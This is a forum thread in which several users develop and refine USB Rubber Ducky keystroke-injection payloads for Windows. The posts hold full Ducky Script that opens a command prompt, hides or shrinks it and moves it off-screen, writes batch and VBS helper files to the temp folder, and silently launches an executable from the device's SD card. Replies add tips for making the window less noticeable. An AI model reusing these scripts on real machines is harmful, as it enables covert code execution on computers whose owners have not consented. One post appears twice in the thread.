overwraith Posted April 18, 2015 Share Posted April 18, 2015 (edited) So, It has come to my attention that some of the payloads have a flaw in their processing, whereby the ducky drive finding code will not run correctly if it is not on an admin machine. I have known for a while, but haven't found a way to fix it. The other day I found out about the "vol" command in batch. So if any of you are knowledgable in batch, I have at least one question, does the "vol" command work on more than one platform, ex windows 7, xp, vista etc. If it does we can retool the code to use "vol" instead of diskpart which has a crippling error when running on non admin computers. Here is some code I have been working on, executes in the command prompt, not a batch file yet. It doesn't work right yet, I am having trouble with the DuckyDrive variable not setting. If any of you know how to fix this, then please post. for %d in (A, B, C, D, E, F, G, H, I, J, K, L, M, N, O, P, Q, R, S, T, U, V, W, X, Y, Z) do ( for /f "tokens=6 delims= " %i in ('Vol %d:') do if %i NEQ "Drive" if %i EQU "DUCKY" echo set DuckyDrive=%d: ) Edited April 18, 2015 by overwraith Quote Link to comment Share on other sites More sharing options...
Xcellerator Posted April 19, 2015 Share Posted April 19, 2015 According to https://en.wikipedia.org/wiki/Vol_%28command%29, its present in DOS, OS/2 and Windows. It doesn't specify exactly what versions of Windows, but if it was in DOS, its probably been there since forever anyway. Nice fix, by the way! Quote Link to comment Share on other sites More sharing options...
overwraith Posted April 19, 2015 Author Share Posted April 19, 2015 It's not done yet, it is still erroring somewhere. I gotta try to figure out why the set command isn't working. I know the vol command is present on my computer, Windows 7, but it is reassuring to hear that it has been around since DOS. Quote Link to comment Share on other sites More sharing options...
overwraith Posted April 19, 2015 Author Share Posted April 19, 2015 (edited) I figured it out, needed quotes in the 'if' statement first parameter. I swear, somebody needs to send me a few batch books, it is difficult gleaning a comprehensive cirriculum from just online web pages and snippets. Also factor in that this stuff was pretty much before my time. for %d in (A, B, C, D, E, F, G, H, I, J, K, L, M, N, O, P, Q, R, S, T, U, V, W, X, Y, Z) do ( for /f "tokens=6 delims= " %i in ('Vol %d:') do (if "%i" EQU "DUCKY" set DuckyDrive=%d: )) This should be the new RunEXE from SD payload, but I haven't got a chance to test it yet, am downloading something, and apparently every time I plug in the ducky to this expansion USB/SD card slot in the front of my computer it drops all currently connected USB devices. Wierd. I need this external hard drive connected during the download. REM Author: overwraith REM Name: RunEXE_V3.txt REM Purpose: Run an executable file off of the SD card after it mounts. Uses a slightly different verison of the drive finder code. REM Encoder V2.4+ REM Using the run command for a broader OS base. DEFAULT_DELAY 75 DELAY 3000 GUI R DELAY 1000 STRING cmd /Q /D /T:7F /F:OFF /V:ON /K DELAY 500 ENTER DELAY 750 ALT SPACE STRING M DOWNARROW REPEAT 100 ENTER REM Change directories because System32 appears to be protected. STRING CD %TEMP% ENTER REM Make batch file that waits for SD card to mount. REM Delete batch file if already exists STRING erase /Q DuckyWait.bat ENTER STRING copy con DuckyWait.bat ENTER REM DuckyWait.bat STRING :while1 ENTER STRING for %%d in (A, B, C, D, E, F, G, H, I, J, K, L, M, N, O, P, Q, R, S, T, U, V, W, X, Y, Z) do ( ENTER STRING for /f "tokens=6 delims= " %%i in ('Vol %%d:') do ( ENTER STRING if "%%i" EQU "DUCKY" ( set "DuckyDrive=%%d:" ) ENTER STRING ) ENTER STRING ) ENTER STRING if Exist %DuckyDrive% ( ENTER STRING goto :break ENTER STRING ) ENTER STRING timeout /t 30 ENTER STRING goto :while1 ENTER STRING :break ENTER REM Continue script. STRING START %DuckyDrive%\HelloWorld.exe ENTER CONTROL z ENTER REM MAKE THE VBS FILE THAT ALLOWS RUNNING INVISIBLY. REM Delete vbs file if already exists STRING erase /Q invis.vbs ENTER REM FROM: http://stackoverflow.com/questions/289498/running-batch-file-in-background-when-windows-boots-up STRING copy con invis.vbs ENTER STRING CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False ENTER CONTROL Z ENTER REM RUN THE BATCH FILE STRING wscript.exe invis.vbs DuckyWait.bat ENTER STRING EXIT ENTER Edited April 19, 2015 by overwraith Quote Link to comment Share on other sites More sharing options...
no42 Posted April 19, 2015 Share Posted April 19, 2015 and he becomes a master / ducky-jedi Quote Link to comment Share on other sites More sharing options...
overwraith Posted April 19, 2015 Author Share Posted April 19, 2015 (edited) ty, I just tested it, had to change a couple of things. Works now. I altered in my original post. Is also now on the github. Edited April 19, 2015 by overwraith Quote Link to comment Share on other sites More sharing options...
White Light Posted April 28, 2015 Share Posted April 28, 2015 Personally, I would do something like this, to avoid having to loop through each drive letter: for /f "tokens=3" %v in ('ver') do if %v==XP (for /f "tokens=3" %a in ('echo list volume ^| diskpart ^| find "Volume" ^| find "RUN"') do start "" %a:\run.exe) else (for /f %a in ('wmic logicaldisk get volumename^,name ^| find "RUN"') do start "" %a\run.exe) Works on Windows XP using diskpart as well as Vista+ using wmic. Quote Link to comment Share on other sites More sharing options...
overwraith Posted April 28, 2015 Author Share Posted April 28, 2015 (edited) Yes, except if you are non admin, or guest, which will make a diskpart black box pop up, derailing the script. There was a reason I was exploring alternate routes. Also, ducks used to be a lot slower than they are now, I would have to test if it automatically mounts the SD immediately. Edited April 28, 2015 by overwraith Quote Link to comment Share on other sites More sharing options...
White Light Posted May 6, 2015 Share Posted May 6, 2015 If you look, it actually only uses diskpart on XP (as XP home doesn't have access to the WMI console). Everything else is all just done in one command. If you were to run CMD and have the above run via the command line directly, the box would be visible only for the amount of time necessary to either query diskpart or WMIC (a few seconds at most). Ducks only seem to mount the FS slowly the first time it is plugged into a computer, making testing timings difficult. I've got a work-in-progress using VBS to loop in the background waiting for the drive to load, which means that timing wouldn't ever be an issue. In the mean time, I would suggest that instead of using cmd /Q /D /T:7F /F:OFF /V:ON /Kyou could try changing the colour setting to something with two dark settings, like 01 (if my memory serves that's dark blue on black background). You could also try reducing the console size to the bare minimum (1 line and somewhere between 10-18 columns, I can never remember). cmd /Q /D /T:01 /F:OFF /V:ON /K mode con cols=18 lines=1Please forgive any mistakes. I'm on mobile right now, so I can't exactly test the syntax of the mode command. Quote Link to comment Share on other sites More sharing options...
overwraith Posted May 6, 2015 Author Share Posted May 6, 2015 Ok, I see the logic now. That's also a good solution. Quote Link to comment Share on other sites More sharing options...
White Light Posted May 7, 2015 Share Posted May 7, 2015 Here's the VBS code I've been working on, along with the modified CMD string. REM DEFAULT_DELAY 20 DELAY 2000 GUI r DELAY 100 STRING cmd /T:01 /K mode con cols=15 lines=1©/y con %tmp%\z.vbs ENTER DELAY 300 STRING on error resume next:Set s = GetObject("winmgmts:"):d="":do while d="" ENTER STRING Set c = s.ExecQuery("Select * from Win32_Volume Where Label='DUCKY'"):set o=c.ItemIndex(0):d=o.Name ENTER STRING if d="" then wscript.sleep 500 ENTER STRING loop ENTER STRING Set w = WScript.CreateObject("WScript.Shell"):w.Run d&"\r.bat", 1 , false ENTER DELAY 10 CTRL z ENTER DELAY 50 STRING start "" %tmp%\z.vbs&exit ENTER Quote Link to comment Share on other sites More sharing options...
White Light Posted May 7, 2015 Share Posted May 7, 2015 Here's the VBS code I've been working on, along with the modified CMD string. REM DEFAULT_DELAY 20 DELAY 2000 GUI r DELAY 100 STRING cmd /T:01 /K mode con cols=15 lines=1©/y con %tmp%\z.vbs ENTER DELAY 300 STRING on error resume next:Set s = GetObject("winmgmts:"):d="":do while d="" ENTER STRING Set c = s.ExecQuery("Select * from Win32_Volume Where Label='DUCKY'"):set o=c.ItemIndex(0):d=o.Name ENTER STRING if d="" then wscript.sleep 500 ENTER STRING loop ENTER STRING Set w = WScript.CreateObject("WScript.Shell"):w.Run d&"\r.bat", 1 , false ENTER DELAY 10 CTRL z ENTER DELAY 50 STRING start "" %tmp%\z.vbs&exit ENTER Weird, it didn't include everything I typed after the code. I really can't be bothered to type out all that again, but I'll summarize. Some CMD switches don't do much or nothing at all. I've included only the ones necessary. Making the window smaller using mode instead of moving it is probably less noticeable. Moving to the left is better than down, as the window generally spawns in upper-left side of screen. VBS code runs silent, loops until it finds the drive named "DUCKY". 90% certain VBS code will work on all XP versions and above. If it won't work on something, it'll be XP Home. Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.